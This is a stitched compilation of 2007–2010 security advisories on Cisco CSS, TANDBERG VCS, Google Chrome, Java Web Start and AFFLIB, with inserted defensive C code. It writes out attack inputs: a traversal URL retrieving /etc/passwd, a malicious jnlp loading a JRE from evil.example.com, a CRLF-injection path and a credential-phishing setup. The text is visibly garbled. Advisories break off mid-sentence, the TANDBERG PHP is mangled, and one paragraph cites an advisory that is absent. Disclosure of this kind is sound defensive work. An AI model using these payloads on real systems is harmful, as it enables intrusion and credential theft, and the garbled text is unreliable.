  Cisco(R) ACE Application Control Engine application switches represent the state of the art in next-generation application switches for increasing the availability, performance, and security of data center applications. The Cisco ACE family of application switches includes the Cisco ACE Service Module for the Cisco Catalyst(R) 6500 Series Switches and Cisco 7600 Series Routers, as well as the Cisco ACE 4710 Appliance in a standalone form factor for discrete data center deployments.

Vulnerability Overview
----------------------
On June 4th 2009, VSR identified multiple weaknesses in the Cisco CSS 11500's handling of HTTP header interpretation and client-side SSL certificates. Individually, these issues may be considered minor, but combined they could allow for the compromise of an application that relies on a vulnerable CSS to assist in authenticating clients. If successfully exploited, an attacker could spoof another application user's identity without possession of the victim's client certificate.

Additionally, because the Cisco CSS product has been effectively superseded by the Cisco ACE, VSR has also identified similar issues to those described below in the ACE in particular configurations.

These issues may affect any CSS installation, but would have the greatest impact on deployments that have the following feature enabled in the configuration:

  ssl-server context http-header client-cert

Similarly, on the Cisco ACE, these issues may manifest themselves when using a policy map with a class-default class, as shown below:

  policy-map type loadbalance first-match SLB-VIP-REDIRECT
    class class-default
      serverfarm TEST-FARM
      action DO-SOMETHING-WITH-HEADERS
        insert-http X-SRC-IP header-value %is

Issue 1: Weak Enforcement of Authority in HTTP Certificate Headers
-------------------------------------------------------------------
Cisco Bug Id - CSCSZ04690
Affects - Cisco CSS

The first weakness affecting the Cisco CSS is that, in a typical client certificate configuration, HTTP clients may confuse web applications by injecting their own certificate headers. When utilizing the CSS to terminate SSL communications, SSL client certificates are first authenticated by the CSS. From there, the CSS will normally pass the client's identity to the back-end web server in the form of several HTTP headers as shown below:

  ClientCert-Subject: XXX
  ClientCert-Subject-CN: XXX
  ClientCert-Fingerprint: XXX
  ClientCert-Subject-CN: XXX
  ClientCert-Issuer-CN: XXX
  ClientCert-Certificate-Version: XXX
  ClientCert-Serial-Number: XXX
  ClientCert-Data-Signature-Algorithm: XXX
  ClientCert-Subject: XXX
  ClientCert-Issuer: XXX
  ClientCert-Not-Before: XXX
  ClientCert-Not-After: XXX
  ClientCert-Public-Key-Algorithm: XXX
  ClientCert-RSA-Modulus-Size: XXX
  ClientCert-RSA-Modulus: XXX
  ClientCert-RSA-Exponent: XXX
  ClientCert-X509v3-Subject-Key-Identifier: XXX
  ClientCert-X509v3-Authority-Key-Identifier: XXX
  ClientCert-Signature-Algorithm: XXX
  ClientCert-Signature: XXX

However, there is no attempt by the CSS to prevent clients from supplying their own ClientCert-* headers. Depending on how application developers handle multiple copies of these headers, an attacker may be able to impersonate other users. For
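The WebLogic plugin advisory and the Cisco CSS issue above fail on opposite sides of the same trust boundary: the plugin lets a client push CRLF into the request line it builds for the backend, and the CSS lets a client's own ClientCert-* headers ride through next to the ones the CSS adds. The following is an added example written for this page, not Oracle or Cisco code. It shows the two things a front-end proxy has to do before forwarding: decode the path only to make routing decisions and re-encode it (or reject it) before it is sent on, and strip every header in the namespace the proxy itself owns before appending its own. The header prefixes, the encoding allowlist, the sample request and the sample header block are constructed for the example.

```c
/* Added example (not Oracle or Cisco code): two proxy-side checks covering
 * CVE-2010-2375 (path re-encoding) and CVE-2010-1575 (client-supplied
 * trusted headers). Sample inputs are constructed. */
#include <stdio.h>
#include <string.h>
#include <ctype.h>

static int hexval(int c)
{
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/* Percent-decode for routing decisions only. -1 on a malformed %XX or overflow. */
static int url_decode(const char *src, char *dst, size_t dstlen)
{
    size_t o = 0;
    while (*src) {
        int c = (unsigned char)*src++;
        if (c == '%') {
            int hi = hexval((unsigned char)src[0]);
            int lo = hi < 0 ? -1 : hexval((unsigned char)src[1]);
            if (lo < 0) return -1;
            c = hi * 16 + lo;
            src += 2;
        }
        if (o + 1 >= dstlen) return -1;
        dst[o++] = (char)c;
    }
    dst[o] = '\0';
    return (int)o;
}

/* 1 if forwarding the decoded path raw would end the request line or a header. */
static int path_would_break_request_line(const char *decoded)
{
    for (; *decoded; decoded++)
        if ((unsigned char)*decoded <= 0x20 || (unsigned char)*decoded == 0x7f) return 1;
    return 0;
}

/* Re-encode before forwarding: only unreserved bytes and '/' pass through,
 * so CR, LF, SP and '%' can never be structural on the backend hop. */
static int url_encode_path(const char *src, char *dst, size_t dstlen)
{
    static const char hex[] = "0123456789ABCDEF";
    size_t o = 0;
    for (; *src; src++) {
        unsigned char c = (unsigned char)*src;
        int safe = isalnum(c) || strchr("-._~/", c) != NULL;
        if (o + (safe ? 1 : 3) >= dstlen) return -1;
        if (safe) dst[o++] = (char)c;
        else { dst[o++] = '%'; dst[o++] = hex[c >> 4]; dst[o++] = hex[c & 15]; }
    }
    dst[o] = '\0';
    return (int)o;
}

static int ci_prefix(const char *s, const char *prefix)
{
    for (; *prefix; s++, prefix++)
        if (tolower((unsigned char)*s) != tolower((unsigned char)*prefix)) return 0;
    return 1;
}

/* Header names the proxy populates itself (assumed list); a client must
 * never be allowed to supply them. Matching is case-insensitive. */
static int is_trusted_header(const char *line)
{
    static const char *const owned[] = { "WL-Proxy-", "ClientCert-", NULL };
    for (int i = 0; owned[i]; i++)
        if (ci_prefix(line, owned[i])) return 1;
    return 0;
}

/* Copy the client's header block to out, dropping proxy-owned names.
 * Lines end in "\r\n" or "\n". Returns the number dropped, -1 on overflow. */
static int strip_trusted_headers(const char *in, char *out, size_t outlen)
{
    size_t o = 0;
    int dropped = 0;
    while (*in) {
        const char *eol = strchr(in, '\n');
        size_t linelen = eol ? (size_t)(eol - in) + 1 : strlen(in);
        if (is_trusted_header(in)) {
            dropped++;
        } else {
            if (o + linelen >= outlen) return -1;
            memcpy(out + o, in, linelen);
            o += linelen;
        }
        in += linelen;
    }
    out[o] = '\0';
    return dropped;
}

/* Demo wrappers on static buffers so results can be inspected directly. */
static char g_dec[512], g_enc[1024], g_hdr[1024];
static const char *demo_decode(const char *s)
{
    return url_decode(s, g_dec, sizeof g_dec) < 0 ? NULL : g_dec;
}
static const char *demo_forward_path(const char *s)
{
    if (!demo_decode(s) || url_encode_path(g_dec, g_enc, sizeof g_enc) < 0) return NULL;
    return g_enc;
}
static int demo_dropped(const char *h) { return strip_trusted_headers(h, g_hdr, sizeof g_hdr); }
static const char *demo_strip(const char *h) { return demo_dropped(h) < 0 ? NULL : g_hdr; }

int main(void)
{
    const char *req = "/logo.gif%20HTTP/1.1%0d%0aX-hdr:%20x";      /* from the advisory */
    const char *hdrs = "Host: app.example.com\r\nWL-Proxy-Client-IP: 10.0.0.1\r\n"
                       "clientcert-subject-cn: admin\r\nAccept: */*\r\n"; /* constructed */
    printf("breaks request line: %d\n", path_would_break_request_line(demo_decode(req)));
    printf("forwarded path     : %s\n", demo_forward_path(req));
    printf("headers dropped    : %d\n%s", demo_dropped(hdrs), demo_strip(hdrs));
    return 0;
}
```

Rejecting a request whose decoded path fails `path_would_break_request_line` is the stricter choice; re-encoding is shown because it preserves legitimate requests whose paths carry spaces or reserved characters. Either way, the header filter has to run before the proxy appends its own WL-Proxy-* or ClientCert-* values, otherwise the backend still sees two copies and the advisory's point about duplicate handling applies.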
CVE-2009-4510: TANDBERG VCS Static SSH Host Keys
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Virtual Security Research, LLC.
http://www.vsecurity.com/
Security Advisory

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
 Advisory Name: TANDBERG Video Communication Server Static SSH Host Keys
  Release Date: 2010-04-09
   Application: Video Communication Server (VCS)
      Versions: x4.3.0, x4.2.1, and possibly earlier
      Severity: High
 Discovered by: Jon Hart
   Advisory by: Timothy D. Morgan tmorgan (a) vsecurity . com
 Vendor Status: Firmware version x5.1.1 released [2].
 CVE Candidate: CVE-2009-4510
     Reference: http://www.vsecurity.com/resources/advisory/20100409-2/
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Product Description
-------------------
From [1]:

  The Video Communication Server (VCS) is an integral part of the TANDBERG Total Solution and is the center of the video communications network, connecting the benefits of video conferencing and telepresence to other communications environments including unified communications and IP Telephony networks.

Vulnerability Overview
----------------------
On December 2nd, VSR identified an SSH server authentication weakness (a static, shared host key) in TANDBERG's Video Communication Server. This issue would allow an attacker with privileged network access to conduct server impersonation and man-in-the-middle attacks on administrator SSH sessions. Successful attacks could yield shell access to vulnerable appliances.

Product Background
------------------
The TANDBERG Video Communication Server is a Linux-based appliance which supports the interoperation of a plethora of video and voice communications devices. The VCS provides several system shell accounts accessible via the SSH protocol.

Vulnerability Details
---------------------
The TANDBERG VCS appliance is deployed by default with a DSA SSH key pair stored in the files:

  /tandberg/sshkeys/ssh_host_dsa_key
  /tandberg/sshkeys/ssh_host_dsa_key.pub

In tested versions of the firmware, this default key has a fingerprint of:

  49:53:bf:94:2a:d7:0c:3f:48:29:f7:5b:5d:de:89:b8

No new key is generated upon installation. In addition, this default key would overwrite any SSH server keys previously installed by security-conscious administrators during a firmware upgrade. Because this key is public (see firmware downloads [2]), an attacker would be able to conduct server impersonation and man-in-the-middle attacks on SSH connections directed at any TANDBERG VCS device. A successful exploit would most likely yield an attacker shell access to the device with the privileges of the victim client.

Versions Affected
-----------------
VSR has observed this vulnerability in version x4.2.1. Based on preliminary analysis of configuration files and scripts [2], versions x4.3.0 and x5.0 also appear to be vulnerable. Earlier versions have not been tested.

Vendor Response
---------------
The following timeline details TANDBERG's response to the reported issue:

2009-12-09  Preliminary notice to TANDBERG. TANDBERG responded immediately.
2009-12-22  VSR provided TANDBERG a draft advisory.
2009-12-28  TANDBERG provided VSR with a beta version of the x5.0 firmware, but this did not appear to correct the issue.
2010-01-22  TANDBERG provided VSR with a beta version of the x5.1 firmware, but this did not appear to correct the issue for existing installations, since old vulnerable keys would be preserved.
2010-01-28  TANDBERG explained that changing SSH keys automatically on administrators may cause backward compatibility problems. Therefore, TANDBERG decided to preserve old keys even when upgrading a system which contains a vulnerable key. Administrators will instead be warned in the web console that a vulnerable key is in use and will be expected to update host keys manually.
2010-03-26  TANDBERG provided VSR with a release candidate firmware for version x5.1.1.
2010-04-07  TANDBERG VCS firmware version x5.1.1 released [2].
2010-04-09  VSR advisory released.

Recommendation
--------------
Immediately replace the current SSH host key with a new one. This may be accomplished through one of several methods. One approach is to simply log in to the device locally and use the ssh-keygen utility to replace the keys stored in /tandberg/sshkeys/. Consult TANDBERG documentation for other methods. After replacing the SSH host keys, it is recommended that the VCS firmware be upgraded to x5.1.1 as soon as possible.

NOTE: Upgrading or downgrading to versions prior to x5.1.1 will cause any custom SSH host keys to be overwritten. Version x5.1.1 and later should preserve any custom host keys previously installed. As a precaution, after
CVE-2009-4511: TANDBERG VCS Arbitrary File Retrieval
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Virtual Security Research, LLC. http://www.vsecurity.com/ Security Advisory - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Advisory Name: TANDBERG Video Communication Server Arbitrary File Retrieval Release Date: 2010-04-09 Application: Video Communication Server (VCS) Versions: x4.3.0, x4.2.1, and possibly earlier Severity: Medium Discovered by: Jon Hart Advisory by: Timothy D. Morgan tmorgan (a) vsecurity . com Vendor Status: Firmware update released [2] CVE Candidate: CVE-2009-4511 Reference: http://www.vsecurity.com/resources/advisory/20100409-3/ - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Product Description - --- - From [1]: The Video Communication Server (VCS) is an integral part of the TANDBERG Total Solution and is the center of the video communications network, connecting the benefits of video conferencing and telepresence to other communications environments including unified communications and IP Telephony networks. Vulnerability Overview - -- On December 3rd, VSR identified a directory traversal and file retrieval vulnerability in the TANDBERG's Video Communication Server. This issue would allow an authenticated attacker (who has access as an administrator or less privileged user on the web administration interface) to retrieve files from the filesystem which are readable by the nobody system user. Product Background - -- The TANDBERG Video Communication Server is a Linux-based appliance which supports the interoperation of a plethora of video and voice communications devices. The VCS provides a web-based management interface implemented in PHP which allows administrators to perform a wide variety of actions, including configuration of the device, management of user accounts, firmware updates, along with number of other items. 
Vulnerability Details - - The TANDBERG VCS web management interface provides two nearly identical scripts at URLs: https://vulnerable.example.com/helppage.php https://vulnerable.example.com/user/helppage.php These help pages accept a file parameter in the URL which can be used to retrieve nearly arbitrary files from the filesystem. The relevant source code for these pages is as follows: // The following is Copyright (C) 2009 TANDBERG // ... // Grab the content before we write anything: we'll need it for the title tag in the head // Dig out the page title, from the title tag, // then remove any surround in the page as we add our own... $filename = $this-helpPagePath . $_GET['page'] . $this-helpPageSuffix; if (! file_exists($filename)) { $helpHTML = There is no help available for the . $_GET['page'] . pagebr/; $pageTitle = $_GET['page']; }else{ $helpHTML = file_get_contents($filename); ... echo \n!-- ** --\n; echo $helpHTML; echo !-- ** --\n; ... // end of excerpt // Here, the final path string ($filename) loaded and displayed to the user is prepended with a directory and appended with a file extension. Using simple directory traversal techniques (../) it is possible to traverse to any directory on the filesystem. Using a trailing NUL byte encoded in the URL (%00) it is also possible to truncate the file path to eliminate the file extension. For instance, the following URL retrieves the /etc/passwd file: https://vulnerable.example.com/helppage.php?page=../../../../etc/passwd%00 During testing, it was found that the x4.2.1 firmware runs the web server as the nobody user, which somewhat limits the amount of sensitive information that may be obtained. However, since shadowed passwords were not configured, it was possible to retrieve all local system users' password hashes from /etc/passwd. Additional password hashes are available in /tandberg/persistent/etc/digest. Versions Affected - - VSR has successfully exploited this issue in firmware version x4.2.1. 
Based on preliminary source code analysis [2], versions x4.3.0 and x5.0 also
appear to be vulnerable. Earlier versions have not been tested.

Vendor Response
---------------
The following timeline details TANDBERG's response to the reported issue:

2009-12-09  Preliminary notice to TANDBERG. TANDBERG responded immediately.
2009-12-22  VSR provided TANDBERG a draft advisory.
2009-12-28  TANDBERG provided VSR with a beta version of the x5.0 firmware,
            but this did not appear to correct the issue (based on PHP code
            analysis alone).
2010-01-22  TANDBERG provided VSR with a beta version of the x5.1 firmware
            for testing which appeared to correct the vulnerability.
2010-03-26  TANDBERG provided VSR with a release candidate firmware for
            version x5.1.1.
2010-04-07  TANDBERG
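The concatenation above, mirrored in C to show why a %00 in the page parameter drops the suffix (PHP passes the raw bytes to the C runtime, whose string functions stop at the first NUL), together with the kind of input validation that closes both the traversal and the NUL truncation. This is an added example, not TANDBERG's code; the base directory, the suffix and the function names are assumptions.

```c
#include <stdbool.h>
#include <string.h>

#define HELP_PATH   "/var/www/help/"   /* assumed helpPagePath */
#define HELP_SUFFIX ".html"            /* assumed helpPageSuffix */

/*
 * Builds the exact byte string PHP would pass to fopen(): directory,
 * the raw bytes of the page parameter (page_len of them, NULs included),
 * then the suffix.  Returns the full length; strlen() of the result is
 * what the C runtime actually sees, which stops at an embedded NUL.
 */
size_t build_help_path(const char *page, size_t page_len, char *out, size_t outsz)
{
    size_t dirlen = strlen(HELP_PATH), suflen = strlen(HELP_SUFFIX);
    size_t need = dirlen + page_len + suflen;
    if (need + 1 > outsz)
        return 0;
    size_t n = 0;
    memcpy(out + n, HELP_PATH, dirlen);   n += dirlen;
    memcpy(out + n, page, page_len);      n += page_len;
    memcpy(out + n, HELP_SUFFIX, suflen); n += suflen;
    out[n] = '\0';
    return n;
}

/*
 * Validator for the page parameter: accept only one path component made of
 * [A-Za-z0-9_-], and compare the byte length the web layer received against
 * strlen() so an embedded NUL (%00) cannot hide the rest of the string.
 * Rejecting '/', '.' and '\\' outright removes every traversal form.
 */
bool safe_help_page(const char *page, size_t page_len)
{
    if (page_len == 0 || page_len > 64)
        return false;
    if (strlen(page) != page_len)          /* embedded NUL */
        return false;
    for (size_t i = 0; i < page_len; i++) {
        unsigned char c = (unsigned char)page[i];
        bool ok = (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') ||
                  (c >= '0' && c <= '9') || c == '_' || c == '-';
        if (!ok)
            return false;
    }
    return true;
}
```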
Chrome Password Manager Cross Origin Weakness (CVE-2010-0556)
Virtual Security Research, LLC.
http://www.vsecurity.com/
Security Advisory

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Advisory Name: Chrome Password Manager Cross Origin Weakness
 Release Date: 2010-02-15
  Application: Google Chrome Web Browser
     Versions: 4.0.249.78, 3.0.195.38, and likely earlier
     Severity: Medium/Low
       Author: Timothy D. Morgan <tmorgan (a) vsecurity . com>
Vendor Status: Update Released [2]
CVE Candidate: CVE-2010-0556
    Reference: http://www.vsecurity.com/resources/advisory/20100215-1/
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Product Description
-------------------
"Google Chrome is a web browser that runs web pages and applications with
 lightning speed." [1]

Vulnerability Overview
----------------------
In mid-January, VSR identified a vulnerability in Google Chrome which could be
used in phishing attacks against specific types of web sites. This issue may
make it much easier to convince a victim to submit web application
credentials to the attacker's site.

Vulnerability Details
---------------------
As with many modern browsers, Google Chrome implements a password manager to
help users keep track of credentials used on various web sites. It may be
used to store either HTTP authentication credentials or form-based
credentials.

The vulnerability surfaces in a situation where a user visits a web page
which includes an embedded object, such as an image, from a third-party site.
If an attacker had control of the third-party web server, he could request
credentials from the user via HTTP authentication. This style of attack has
been documented in the past, and some variations on this theme are explored
in a recent paper by VSR [5]. However, in the case of vulnerable versions of
Google Chrome, the password manager may pre-fill the authentication dialog
box with credentials intended for the parent page's domain, leaving users one
click away from account compromise.
This issue would affect Chrome users who use applications that allow users to
embed objects from third parties. Examples of such applications may include
message boards, blogs, or social networking sites.

The following steps may be used to reproduce the issue:

1. Set up an HTML page with the following contents:

     <html><body>
     <img src="http://evil.example.com/image.png" />
     </body></html>

   This page should not be protected by any authentication and should be
   hosted at:

     http://victim.example.org/test-img.html

2. Set up an HTTP digest protected area under the following URL:

     http://victim.example.org/private/

3. Set up the attacker's server to be protected by HTTP authentication such
   that the following URL is protected:

     http://evil.example.com/image.png

4. Use Google Chrome to log in to an area protected with HTTP authentication,
   such as:

     http://victim.example.org/private

   Save the password in the password manager.

5. Finally, access the unauthenticated HTML page on the victim's server:

     http://victim.example.org/test-img.html

   Since the embedded image requires authentication, a password prompt should
   appear. In vulnerable versions of Google Chrome, this form will be
   pre-filled with the stored credentials from the victim.example.org domain,
   even though the password prompt is generated by evil.example.com.

Versions Affected
-----------------
The issue was originally discovered in version 3.0.195.38 and was also
verified to exist in version 4.0.249.78. Testing was conducted on the Windows
platform.

Vendor Response
---------------
The following timeline details Google's response to the reported issue:

2010-01-20  VSR submitted a security bug report [3]. Chromium development
            team began researching the issue.
2010-01-21  VSR provided additional details on the test scenario. Chromium
            developers successfully reproduced the issue and committed a fix
            to the source repository [4].
2010-02-10  Chrome stable version 4.0.249.89 released which includes the fix.
2010-02-15  VSR advisory released.
Recommendation
--------------
Upgrade to the latest version of Google Chrome as soon as possible. Users are
advised to be wary of HTTP authentication prompts and to carefully inspect
the domains presented in these messages to see if they match the domain of
the expected site.

Common Vulnerabilities and Exposures (CVE) Information
------------------------------------------------------
The Common Vulnerabilities and Exposures (CVE) project has assigned the
number CVE-2010-0556 to this issue. This is a candidate for inclusion in the
CVE list (http://cve.mitre.org), which standardizes names for security
problems.

Acknowledgements
----------------
Thanks to the Chromium development team for the prompt response.
CVE-2008-2086: Java Web Start File Inclusion via System Properties Override
Virtual Security Research, LLC.
http://www.vsecurity.com/
Security Advisory

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Advisory Name: Java Web Start File Inclusion via System Properties Override
 Release Date: 2008-12-03
  Application: Sun Java Runtime Environment / Java Web Start
     Versions: See below
     Severity: High
       Author: Timothy D. Morgan <tmorgan {a} vsecurity.com>
Vendor Status: Patch Released [3]
CVE Candidate: CVE-2008-2086
    Reference: http://www.vsecurity.com/bulletins/advisories/2008/JWS-props.txt
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Product Description
-------------------
From [1]:

  "Using Java Web Start technology, standalone Java software applications can
   be deployed with a single click over the network. Java Web Start ensures
   the most current version of the application will be deployed, as well as
   the correct version of the Java Runtime Environment (JRE)."

Vulnerability Overview
----------------------
On March 27th, VSR identified a vulnerability in Java Web Start related to
the execution of privileged applications. This flaw could allow an attacker
to execute arbitrary code on a victim system if a user could be convinced to
visit a malicious web site.

Product Background
------------------
Java Web Start (JWS) applications are launched through specially formatted
XML files hosted on web sites with a "jnlp" file extension. These files
reference one or more jar files which are meant to be downloaded and executed
by client systems. JWS applications are run in unprivileged mode by default
but may be run with full user privileges if the jnlp file requests this
access. Privileged JWS applications must have each jar file signed by the
same trusted author in order to be executed. However, jnlp files are not
signed and may be hosted by third-party web sites.
In addition to specifying application components, the jnlp specification
permits application authors to supply certain System properties which may be
retrieved by the application through the System.getProperty() and
System.getProperties() methods. Besides any user-supplied properties, the
Java VM also provides access to a number of sensitive runtime settings
through this interface. More information on the jnlp format may be found in
[2].

Vulnerability Details
---------------------
VSR discovered an unsafe behavior in the way properties are interpreted when
specified in jnlp files. In certain versions of the Java Runtime Environment
(JRE), values supplied through jnlp files override existing system defaults.
Thus far, VSR has verified that the following System properties may be
overridden:

  java.home
  java.ext.dirs
  user.home

Of particular interest are the java.home and java.ext.dirs properties. If an
attacker could lure a victim to open a malicious jnlp file which references
a trusted application, it may be executed without any confirmation by the
user. However, as the application attempts to load classes, it may trust the
malicious java.home and/or java.ext.dirs value. These paths could point to a
malicious local or remote JRE or extensions installation. It appears that
under Windows, UNC network paths may be used for the java.home value. It is
not yet known whether or not UNC paths may be used for java.ext.dirs.

During testing, VSR found that Java Cryptography Extension (JCE) classes
failed to load when java.home was set to an invalid path. However, by setting
this path to a network share which hosted a valid JRE installation, the JCE
classes loaded correctly. If such a network share were hosted by the
attacker, then arbitrary code could potentially be loaded without
restrictions, unbeknownst to the victim. The following XML shows what a
malicious jnlp file might look like.
Note that the malicious jnlp file would likely be very similar to the ones
users normally rely on, with certain properties overridden in the resources
section.

  <jnlp spec="1.0+" codebase="http://trusted.example.org/" href="evil.jnlp">
    <information>
      <title>Trusted Application</title>
      <vendor>Trusted Vendor</vendor>
      <description>Trusted Application by Trusted Vendor</description>
      <homepage href="http://trusted.example.org/" />
      <offline-allowed />
    </information>
    <security><all-permissions /></security>
    <resources>
      <j2se version="1.5+" />
      <!-- Next line overrides the JRE's java.home System property -->
      <property name="java.home" value="\\evil.example.com\jre" />
      <jar href="signed-and-trusted-jce-dependent-library.jar" />
    </resources>
    <application-desc main-class="org.example.trusted.app.StartApp" />
  </jnlp>

To fully exploit this specific attack vector, an attacker would need to
remotely or locally host a malicious version of classes used by a trusted
application and then lure a user into opening a malicious jnlp
AFFLIB(TM): Multiple Buffer Overflows
  (path,fn+match[2].rm_so,match[2].rm_eo-match[2].rm_so);

The overflow occurs because the length specified to memcpy() is the length of
the regular expression match, without regard to the size of the path buffer.
This may be exploitable in scenarios where an attacker could pass command
line parameters to a privileged aimage program, or via a program written by
a third-party developer.

* Stack-based Buffer Overflow in libewf Vnode Wrapper *

File: lib/vnode_ewf.cpp
Line: 70

Description:
A potentially untrustworthy parameter is used without length checking in a
strcpy() call which writes to a stack-based buffer. If this command receives
parameters from an untrusted source, code execution would be a major risk.
Lines 59-70 are included to illustrate the problem:

  static int ewf_open(AFFILE *af)
  {
      if(strchr(af->fname,'.')==0) return -1; // need a '.' in the filename

      /* See how many files there are to open */
      char **files = (char **)malloc(sizeof(char *));
      int nfiles = 1;
      files[0] = strdup(af->fname);

      char fname[MAXPATHLEN+1];
      strcpy(fname,af->fname);

An overflow could occur because the af->fname string is provided by the user,
and is not limited to MAXPATHLEN. An attacker could use this in scenarios
where a 3rd-party program incorporates AFFLIB(TM) into their program (which
ultimately accepts file names from an untrusted source) or in situations
where an AFFLIB(TM) binary is setuid/setgid or is executed remotely by web
applications.

* Stack-based Buffer Overflow in AFD Vnode Wrapper *

File: lib/vnode_afd.cpp
Line: 405

Description:
A potentially untrustworthy parameter is used without length checking in a
strcpy() call which writes to a stack-based buffer. If this command receives
parameters from an untrusted source, code execution would be a major risk.
Lines 402-412 are included below for illustration:

  while ((dp = readdir(dirp)) != NULL){
      if (last4_is_aff(dp->d_name)){
          char path[MAXPATHLEN+1];
          strcpy(path,af->fname);
          strlcat(path,"/",sizeof(path));
          strlcat(path,dp->d_name,sizeof(path));
          if(afd_add_file(af,path)){
              return -1;
          }
      }
  }

The overflow would occur if a value for af->fname were specified by a user
which was larger than 1025 bytes. This is certainly plausible, since many
systems allow pathnames to be as large as 4096 bytes. As this is part of the
core AFFLIB(TM), it could be exploited in 3rd-party programs which include
AFFLIB(TM) support, if an attacker were allowed to specify filenames. In
addition, it could be exploited if any AFFLIB(TM) binary were setuid/setgid,
or if these programs were executed from a CGI script or similar remote
connection.

* Stack-based Buffer Overflow in aimage Input File Name *

File: aimage/aimage.cpp
Line: 554

Description:
A command line parameter is used without length checking in a sprintf()
call, which writes to a stack-based buffer. If this command (or this
function) receives parameters from an untrusted source, code execution would
be a major risk. Lines 548-554 are included for illustration:

  int getlock(class imager *im)
  {
      /* If the file exists and the PID in the file is running,
       * can't get the lock.
       */
      char lockfile[MAXPATHLEN];
      sprintf(lockfile,"/tmp/aimge.%s.lock",im->infile);

An attacker could exploit this problem if the aimage binary were
setuid/setgid, or if the aimage program were executed in a CGI script or
something similar.

Vendor Response:
Simson Garfinkel was first contacted on 2007-03-31. The following timeline
outlines the responses from the vendor regarding this issue:

2007-04-01 - Vendor provided details of all vulnerabilities identified.
2007-04-03 - Continued vendor communication.
2007-04-05 - Vendor released version 2.2.6, containing multiple security
             fixes.
2007-04-06 - Vendor notified VSR that fixes were released.
2007-04-09 - VSR notified vendor that 9 vulnerability instances still
             remained in latest release.
2007-04-12 - Vendor confirmed that remaining vulnerabilities would be fixed
             in next release.
2007-04-25 - Vendor released versions 2.2.7 and 2.2.8. Vendor did not notify
             VSR.
2007-04-27 - VSR discovered new versions were released. VSR inspected version
             2.2.8 and found that no additional vulnerabilities were fixed.
             VSR advisories published.

Recommendation:
AFFLIB(TM) users should upgrade to the newest version. Third-party projects
which rely on AFFLIB(TM) should encourage users to upgrade, and/or
incorporate fixes into their distribution of the library. The update is
available via:

  http://www.afflib.org/downloads/

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Common Vulnerabilities and Exposures (CVE) Information:
The Common
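Bounded replacements for the three unchecked copies above (strcpy() into fname, strcpy()+strlcat() into path, and sprintf() into lockfile), written so that a name which does not fit is refused rather than silently shortened. This is an added example, not AFFLIB's code; the buffer size AFF_PATHLEN is taken from the 1025-byte figure in the advisory and the function names are assumptions.

```c
#include <stdio.h>
#include <string.h>

/* Buffer size the advisory's "larger than 1025 bytes" implies for the
 * MAXPATHLEN+1 stack buffers (Linux's own MAXPATHLEN is 4096). */
#define AFF_PATHLEN 1024

/* Bounded replacement for strcpy(fname, af->fname).  A silently truncated
 * path would name a different file, so an oversize name is an error.
 * Returns 0 on success, -1 if the name does not fit. */
int copy_fname(const char *src, char *dst, size_t dstsz)
{
    size_t n = strlen(src);
    if (n >= dstsz)
        return -1;
    memcpy(dst, src, n + 1);
    return 0;
}

/* Bounded replacement for strcpy(path, af->fname) followed by the two
 * strlcat() calls.  snprintf() reports the length it wanted to write, so a
 * value >= dstsz means the result was cut and must not be used. */
int join_dir_entry(const char *dir, const char *entry, char *dst, size_t dstsz)
{
    int n = snprintf(dst, dstsz, "%s/%s", dir, entry);
    if (n < 0 || (size_t)n >= dstsz) {
        dst[0] = '\0';
        return -1;
    }
    return 0;
}

/* Bounded replacement for sprintf(lockfile, "/tmp/aimge.%s.lock", im->infile). */
int build_lockfile_name(const char *infile, char *dst, size_t dstsz)
{
    int n = snprintf(dst, dstsz, "/tmp/aimge.%s.lock", infile);
    if (n < 0 || (size_t)n >= dstsz) {
        dst[0] = '\0';
        return -1;
    }
    return 0;
}

/* Demonstration with a constructed 4096-byte name, the pathname size the
 * advisory notes many systems allow, which would overrun the original
 * AFF_PATHLEN+1 stack buffers.  Returns how many routines refused it. */
int demo_long_name_rejected(void)
{
    static char longname[4096 + 1];
    memset(longname, 'A', 4096);
    longname[4096] = '\0';

    char fname[AFF_PATHLEN + 1];
    char path[AFF_PATHLEN + 1];
    char lock[AFF_PATHLEN];
    int rejected = 0;
    if (copy_fname(longname, fname, sizeof fname) == -1) rejected++;
    if (join_dir_entry(longname, "image.aff", path, sizeof path) == -1) rejected++;
    if (build_lockfile_name(longname, lock, sizeof lock) == -1) rejected++;
    return rejected;   /* 3: every bounded routine refused the oversize name */
}
```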
AFFLIB(TM): Multiple Shell Metacharacter Injections
Virtual Security Research, LLC.
http://www.vsecurity.com/
Security Advisory

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Advisory Name: Multiple Shell Metacharacter Injections in AFFLIB
 Release Date: 2007-04-27
  Application: AFFLIB(TM)
     Versions: 2.2.0-2.2.8 and likely earlier versions
     Severity: Medium to Low
       Author: Timothy D. Morgan <tmorgan {at} vsecurity {dot} com>
Vendor Status: Vendor Notified
